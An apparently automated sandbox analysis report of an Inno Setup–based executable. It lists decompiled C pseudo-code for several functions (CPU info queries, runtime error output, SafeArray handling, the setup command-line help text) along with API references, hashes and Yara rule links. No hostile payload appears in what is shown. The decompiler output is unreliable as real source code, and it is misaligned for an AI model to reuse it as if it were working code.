                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Thread$Current$CreateErrorLast
                                                            • String ID: 0@G$XtI$l@
                                                            • API String ID: 3539746228-385768319
                                                            • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                            • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                            • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                            • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 36%
                                                            			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                            0x00406425
                                                            0x00406427
                                                            0x0040642c
                                                            0x00406446
                                                            0x004064d9
                                                            0x004064d9
                                                            0x00000000
                                                            0x0040644c
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406450
                                                            0x00406452
                                                            0x00406459
                                                            0x00000000
                                                            0x00406465
                                                            0x0040646d
                                                            0x00406472
                                                            0x00406473
                                                            0x00406478
                                                            0x0040647b
                                                            0x00406481
                                                            0x00406485
                                                            0x00406486
                                                            0x0040648b
                                                            0x00406492
                                                            0x004064bc
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064d1
                                                            0x00406494
                                                            0x00406494
                                                            0x004064af
                                                            0x004064b2
                                                            0x004064ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ba
                                                            0x004064a5
                                                            0x004064a8
                                                            0x004064e0
                                                            0x004064e6
                                                            0x004064e6
                                                            0x00406492
                                                            0x00406459
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                            • API String ID: 4275029093-79381301
                                                            • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                            • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                            • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                            • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 43%
                                                            			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                            0x004076c0
                                                            0x00407726
                                                            0x00407728
                                                            0x0040772a
                                                            0x0040772f
                                                            0x00407734
                                                            0x00407736
                                                            0x00407736
                                                            0x0040773c
                                                            0x004076c2
                                                            0x004076cb
                                                            0x004076db
                                                            0x004076db
                                                            0x004076f7
                                                            0x0040770a
                                                            0x0040771e
                                                            0x0040771e

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 3320372497-2970929446
                                                            • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                            • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                            • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                            • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}





                                                            0x00420532
                                                            0x0042055f
                                                            0x00420564
                                                            0x00420569
                                                            0x00420573
                                                            0x00420534
                                                            0x00420544
                                                            0x00420549
                                                            0x0042054e
                                                            0x0042054e

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
                                                            • API String ID: 1883125708-3870080525
                                                            • Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                            • Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
                                                            • Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
                                                            • Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                            0x0042931c
                                                            0x00429328
                                                            0x0042932e
                                                            0x00429334
                                                            0x00429344
                                                            0x0042934b
                                                            0x0042934b
                                                            0x00429356
                                                            0x00429364
                                                            0x004294ef
                                                            0x004294f6
                                                            0x004294f7
                                                            0x00000000
                                                            0x0042936a
                                                            0x0042936d
                                                            0x0042938b
                                                            0x0042936f
                                                            0x0042937a
                                                            0x0042937a
                                                            0x0042939a
                                                            0x004293a6
                                                            0x004293a9
                                                            0x00429416
                                                            0x0042941c
                                                            0x0042941d
                                                            0x00429423
                                                            0x00429424
                                                            0x00429426
                                                            0x0042942b
                                                            0x0042942f
                                                            0x00429431
                                                            0x00429431
                                                            0x0042943c
                                                            0x00429447
                                                            0x00429452
                                                            0x0042945b
                                                            0x0042945e
                                                            0x0042947a
                                                            0x00429481
                                                            0x0042948c
                                                            0x004294a3
                                                            0x004294a8
                                                            0x004294bc
                                                            0x004294c1
                                                            0x004294d4
                                                            0x004294d4
                                                            0x004294dd
                                                            0x00429460
                                                            0x00429460
                                                            0x00429461
                                                            0x00429467
                                                            0x0042946d
                                                            0x0042946f
                                                            0x00429471
                                                            0x00429474
                                                            0x00429477
                                                            0x00429477
                                                            0x0042947a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0042947a
                                                            0x004293ab
                                                            0x004293ab
                                                            0x004293ac
                                                            0x004293ae
                                                            0x004293b4
                                                            0x004293b6
                                                            0x004293c5
                                                            0x004293c6
                                                            0x004293d0
                                                            0x004293d1
                                                            0x004293d6
                                                            0x004293e1
                                                            0x004293e2
                                                            0x004293ec
                                                            0x004293ed
                                                            0x004293f2
                                                            0x0042940d
                                                            0x0042940f
                                                            0x00429410
                                                            0x00429413
                                                            0x00429413
                                                            0x00000000
                                                            0x004293b4
                                                            0x004293a9

                                                            APIs
                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
                                                            • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
                                                            • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
                                                            • VariantCopy.OLEAUT32(?,?), ref: 004294F7
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                            • String ID:
                                                            • API String ID: 351091851-0
                                                            • Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                            • Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
                                                            • Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
                                                            • Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 34%
                                                            			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}










                                                            0x004afa44
                                                            0x004afa44
                                                            0x004afa47
                                                            0x004afa49
                                                            0x004afa4c
                                                            0x004afa50
                                                            0x004afa51
                                                            0x004afa56
                                                            0x004afa59
                                                            0x004afa63
                                                            0x004afa77
                                                            0x004afa65
                                                            0x004afa6d
                                                            0x004afa6d
                                                            0x004afa7c
                                                            0x004afa81
                                                            0x004afa84
                                                            0x004afa85
                                                            0x004afa8a
                                                            0x004afa97
                                                            0x004afaae
                                                            0x004afab5
                                                            0x004afab8
                                                            0x004afabb
                                                            0x004afacd

                                                            APIs
                                                            • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE
                                                            Strings
                                                            • Setup, xrefs: 004AFA9E
                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
                                                            • /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
                                                            • For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                            • API String ID: 2030045667-3391638011
                                                            • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                            • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                            • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                            • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 69%
                                                            			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}
























                                                            0x0042f9b8
                                                            0x0042f9b8
                                                            0x0042f9b9
                                                            0x0042f9bb
